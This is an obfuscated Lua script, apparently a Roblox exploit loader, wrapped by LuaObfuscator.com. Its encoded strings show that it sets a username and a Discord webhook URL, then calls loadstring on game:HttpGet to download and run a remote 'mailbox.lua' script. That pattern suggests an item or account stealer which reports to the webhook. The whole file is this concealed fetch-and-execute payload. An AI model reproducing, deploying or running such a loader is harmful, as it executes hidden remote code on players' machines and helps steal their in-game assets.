--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v70=0;while true do if (v70==0) then v19=v0(v3(v30,1,1));return "";end end else local v71=v2(v0(v30,16));if v19 then local v78=v5(v71,v19);v19=nil;return v78;else return v71;end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(878 -(282 + 595)))) -(v32-1)) + (620 -(555 + 64)))) ;return v72-(v72%(932 -((2494 -(1523 + 114)) + 74))) ;else local v73=568 -(330 + 37 + (286 -85)) ;local v74;while true do if (v73==(927 -(214 + 713))) then v74=((1066 -(68 + 997)) + 1)^(v32-1) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or 0 ;end end end end local function v21()local v34=(282 + 988) -(226 + (2001 -(892 + 65))) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) + 0 ;v34=1;end end end local function v22()local v36=0 -(0 -0) ;local v37;local v38;while true do if (v36==0) then v37,v38=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;v36=1 -0 ;end if (v36==(351 -(87 + 263))) then return (v38 * 256) + v37 ;end end end local function v23()local v39=(555 + 397) -(802 + 150) ;local v40;local v41;local v42;local v43;while true do if (v39==(2 -(1 -0))) then return (v43 * 16777216) + (v42 * 65536) + (v41 * (464 -208)) + v40 ;end if (v39==0) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 + (1187 -(1069 + 118)) );v18=v18 + (1001 -(915 + 82)) ;v39=2 -1 ;end end end local function v24()local v44=v23();local v45=v23();local v46=2 -1 ;local v47=(v20(v45,1 -0 ,4 + 16 ) * (((14 -11) -1)^32)) + v44 ;local v48=v20(v45,793 -(201 + 571) ,13 + 18 );local v49=((v20(v45,32 + 0 )==1) and  -(792 -(368 + 423))) or (3 -(6 -4)) ;if (v48==(18 -(10 + 8))) then if (v47==(0 -0)) then return v49 * (0 -(1747 -(760 + 987))) ;else local v79=859 -(814 + 45) ;while true do if (v79==(0 -0)) then v48=443 -(416 + (1939 -(1789 + 124))) ;v46=0;break;end end end elseif (v48==((1490 -(745 + 21)) + 456 + 867)) then return ((v47==(0 -0)) and (v49 * ((1 + 0)/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-((4019 -2558) -(145 + 293)) ) * (v46 + (v47/((6 -4)^52))) ;end local function v25(v50)local v51=(0 -0) -0 ;local v52;local v53;while true do if (v51==((1817 -(1703 + 114)) + 0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=1056 -((788 -(376 + 325)) + 968) ;end if (v51==3) then return v6(v53);end if ((8 -6)==v51) then v53={};for v80=1, #v52 do v53[v80]=v2(v1(v3(v52,v80,v80)));end v51=3;end if (v51==((1 -0) + 0)) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=1415 -(447 + 966) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==(107 -(8 + 98))) then v57=nil;v58=nil;v54=880 -(284 + 594) ;end if (v54==(6 -3)) then v61=nil;v62=nil;v54=11 -7 ;end if (v54==0) then v55=0;v56=nil;v54=167 -(122 + 44) ;end if (v54~=2) then else v59=nil;v60=nil;v54=5 -2 ;end if (v54~=4) then else while true do if (v55==1) then local v98=0;while true do if (v98~=1) then else v55=6 -4 ;break;end if ((0 + 0)==v98) then local v108=0 + 0 ;while true do if (v108==0) then v58=nil;v59=nil;v108=1;end if (v108==(1 -0)) then v98=1;break;end end end end end if (v55~=3) then else v62=nil;while true do local v100=0;local v101;while true do if (v100==(65 -(30 + 35))) then v101=0 + 0 ;while true do if (v101==(1258 -(1043 + 214))) then if (v56==0) then local v115=0 -0 ;local v116;local v117;while true do if (v115==(1212 -(323 + 889))) then v116=0 -0 ;v117=nil;v115=581 -(361 + 219) ;end if (v115==(321 -(53 + 267))) then while true do if (v116==0) then v117=0 + 0 ;while true do if ((413 -(15 + 398))==v117) then local v170=982 -(18 + 964) ;local v171;while true do if (v170==0) then v171=0 -0 ;while true do if ((0 + 0)==v171) then v57={};v58={};v171=1;end if (1==v171) then v117=1 + 0 ;break;end end break;end end end if (v117~=1) then else local v172=0;local v173;while true do if (v172==0) then v173=850 -(20 + 830) ;while true do if (v173==(0 + 0)) then local v182=126 -(116 + 10) ;while true do if (v182~=0) then else v59={};v60={v57,v58,nil,v59};v182=1 + 0 ;end if (v182==1) then v173=1 + 0 ;break;end end end if (v173==1) then v117=1 + 1 ;break;end end break;end end end if (v117~=(4 -2)) then else v56=1;break;end end break;end end break;end end end break;end if (v101~=(0 -0)) then else if (v56~=1) then else local v118=1551 -(1126 + 425) ;local v119;local v120;while true do if (v118==0) then v119=405 -(118 + 287) ;v120=nil;v118=1;end if (v118==(3 -2)) then while true do if (v119~=(1121 -(118 + 1003))) then else v120=0;while true do if (v120==(2 -1)) then local v174=0;while true do if (v174~=0) then else for v178=1,v61 do local v179=377 -(142 + 235) ;local v180;local v181;while true do if (v179==(0 -0)) then local v186=0;local v187;while true do if (v186~=(0 + 0)) then else v187=977 -(553 + 424) ;while true do if (v187==1) then v179=1 -0 ;break;end if (v187==(0 + 0)) then local v189=0;while true do if ((0 + 0)~=v189) then else v180=v21();v181=nil;v189=1;end if (v189==1) then v187=1;break;end end end end break;end end end if (v179==1) then if (v180==(1 + 0)) then v181=v21()~=0 ;elseif (v180==(1 + 1)) then v181=v24();elseif (v180==(2 + 1)) then v181=v25();end v62[v178]=v181;break;end end end v60[6 -3 ]=v21();v174=2 -1 ;end if (v174==1) then v120=4 -2 ;break;end end end if (v120==(0 + 0)) then local v175=0 -0 ;local v176;while true do if ((753 -(239 + 514))==v175) then v176=0 + 0 ;while true do if (v176~=(1330 -(797 + 532))) then else v120=1 + 0 ;break;end if (0==v176) then local v183=0;while true do if ((0 + 0)==v183) then v61=v23();v62={};v183=1;end if (v183~=1) then else v176=2 -1 ;break;end end end end break;end end end if (v120~=2) then else v56=1204 -(373 + 829) ;break;end end break;end end break;end end end if (v56==(733 -(476 + 255))) then local v121=1130 -(369 + 761) ;local v122;local v123;while true do if (v121==(0 + 0)) then v122=0 -0 ;v123=nil;v121=1;end if (v121~=(1 -0)) then else while true do if (v122==0) then v123=238 -(64 + 174) ;while true do local v166=0;local v167;while true do if (v166==0) then v167=0 + 0 ;while true do if (v167~=(0 -0)) then else if (v123==(336 -(144 + 192))) then local v184=0;local v185;while true do if (v184==(216 -(42 + 174))) then v185=0 + 0 ;while true do if (v185==1) then v123=1 + 0 ;break;end if (v185==0) then for v190=1 + 0 ,v23() do local v191=1504 -(363 + 1141) ;local v192;local v193;while true do if (v191==(1580 -(1183 + 397))) then local v196=0 -0 ;while true do if (v196~=0) then else v192=0 + 0 ;v193=nil;v196=1;end if (v196==1) then v191=1;break;end end end if (v191~=1) then else while true do if (v192~=0) then else v193=v21();if (v20(v193,1 + 0 ,1)==0) then local v197=1975 -(1913 + 62) ;local v198;local v199;local v200;local v201;while true do if (v197==(2 + 0)) then while true do if (v198~=2) then else local v202=0;while true do if (v202==0) then if (v20(v200,2 -1 ,1)~=(1934 -(565 + 1368))) then else v201[7 -5 ]=v62[v201[2]];end if (v20(v200,1663 -(1477 + 184) ,2 -0 )==(1 + 0)) then v201[859 -(564 + 292) ]=v62[v201[3]];end v202=1 -0 ;end if (v202~=(2 -1)) then else v198=3;break;end end end if (3==v198) then if (v20(v200,307 -(244 + 60) ,3)==(1 + 0)) then v201[4]=v62[v201[480 -(41 + 435) ]];end v57[v190]=v201;break;end if (v198==1) then local v204=1001 -(938 + 63) ;while true do if (v204==0) then v201={v22(),v22(),nil,nil};if (v199==(0 + 0)) then local v212=0;local v213;local v214;while true do if (v212==(1139 -(782 + 356))) then while true do if (v213~=(267 -(176 + 91))) then else v214=0;while true do if (v214~=0) then else v201[7 -4 ]=v22();v201[4]=v22();break;end end break;end end break;end if (v212==(0 -0)) then v213=1092 -(975 + 117) ;v214=nil;v212=1;end end elseif (v199==1) then v201[1878 -(157 + 1718) ]=v23();elseif (v199==(2 + 0)) then v201[3]=v23() -(2^16) ;elseif (v199~=(10 -7)) then else local v217=0 -0 ;while true do if (v217==0) then v201[3]=v23() -(2^16) ;v201[1022 -(697 + 321) ]=v22();break;end end end v204=1;end if (v204==(2 -1)) then v198=3 -1 ;break;end end end if (v198==(0 -0)) then local v205=0 + 0 ;while true do if (v205~=(0 -0)) then else v199=v20(v193,5 -3 ,3);v200=v20(v193,4,6);v205=1;end if (v205~=(1228 -(322 + 905))) then else v198=612 -(602 + 9) ;break;end end end end break;end if (v197~=(1190 -(449 + 740))) then else v200=nil;v201=nil;v197=2;end if (v197~=0) then else v198=0;v199=nil;v197=1;end end end break;end end break;end end end for v194=873 -(826 + 46) ,v23() do v58[v194-(948 -(245 + 702)) ]=v28();end v185=3 -2 ;end end break;end end end if (v123==1) then return v60;end break;end end break;end end end break;end end break;end end end v101=1;end end break;end end end break;end if (v55==0) then v56=0 + 0 ;v57=nil;v55=1;end if ((1900 -(260 + 1638))==v55) then local v99=0;while true do if (v99==(441 -(382 + 58))) then v55=3;break;end if (v99~=0) then else v60=nil;v61=nil;v99=1;end end end end break;end end end local function v29(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end if (v66==1) then v69=v63[3];return function(...)local v82=v67;local v83=v68;local v84=v69;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end if (v97==1) then if (v95<=5) then if (v95<=2) then if (v95<=0) then v92[v94[2]]=v94[3]~=0 ;elseif (v95>1) then local v124;local v125,v126;local v127;local v128;v92[v94[2]]=v65[v94[3]];v86=v86 + 1 ;v94=v82[v86];v128=v94[2];v127=v92[v94[3]];v92[v128 + 1 ]=v127;v92[v128]=v127[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3]~=0 ;v86=v86 + 1 ;v94=v82[v86];v128=v94[2];v125,v126=v85(v92[v128](v13(v92,v128 + 1 ,v94[3])));v87=(v126 + v128) -1 ;v124=0;for v154=v128,v87 do v124=v124 + 1 ;v92[v154]=v125[v124];end v86=v86 + 1 ;v94=v82[v86];v128=v94[2];v92[v128]=v92[v128](v13(v92,v128 + 1 ,v87));v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v86=v94[3];else v86=v94[3];end elseif (v95<=3) then v92[v94[2]]=v65[v94[3]];elseif (v95>4) then local v139=0;local v140;local v141;local v142;local v143;while true do if (1==v139) then v87=(v142 + v140) -1 ;v143=0;v139=2;end if (v139==2) then for v164=v140,v87 do local v165=0;while true do if (v165==0) then v143=v143 + 1 ;v92[v164]=v141[v143];break;end end end break;end if (v139==0) then v140=v94[2];v141,v142=v85(v92[v140](v13(v92,v140 + 1 ,v94[3])));v139=1;end end else do return;end end elseif (v95<=8) then if (v95<=6) then local v112=0;local v113;local v114;while true do if (v112==1) then v92[v113 + 1 ]=v114;v92[v113]=v114[v94[4]];break;end if (0==v112) then v113=v94[2];v114=v92[v94[3]];v112=1;end end elseif (v95==7) then v92[v94[2]]();elseif (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95<=10) then if (v95==9) then local v144=v94[2];v92[v144]=v92[v144](v13(v92,v144 + 1 ,v87));else v65[v94[3]]=v92[v94[2]];end elseif (v95==11) then v92[v94[2]]=v94[3];else v65[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v65[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v86=v94[3];end v86=v86 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D6503133O004F2O46494349414C5F48616E616E313233343503073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130373831353835303639353734313436302F4D344F423534694C576E50584E4D2D74574D46336D672O445356433456646E425348797635504F4A4F3538527A457864704B774C2O72382O567A4C70374F57627666484700153O00120B3O00013O0026083O000C000100020004013O000C0001001203000100033O001202000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026083O0001000100010004013O0001000100120B000100083O00120C000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00043O00017O00",v9(),...);end